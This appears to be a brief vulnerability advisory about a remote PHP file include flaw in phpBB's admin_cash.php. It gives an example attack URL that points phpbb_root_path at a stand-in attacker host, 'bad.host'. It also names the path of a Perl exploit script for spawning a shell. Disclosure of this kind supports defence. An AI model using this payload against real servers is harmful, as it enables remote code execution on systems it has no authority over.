PHPBB Admin_cash.PHP Remote PHP File Include Vulnerability

PHPBB Admin_cash.PHP Remote PHP File Include Vulnerability

No exploit is required, however the following examples have been made available:

http://www.example.com/phpBB2/admin/admin_cash.php?setmodules=1&phpbb_root_path=http://bad.host/

/data/vulnerabilities/exploits/phpBB2BashShellSpawnExploit.pl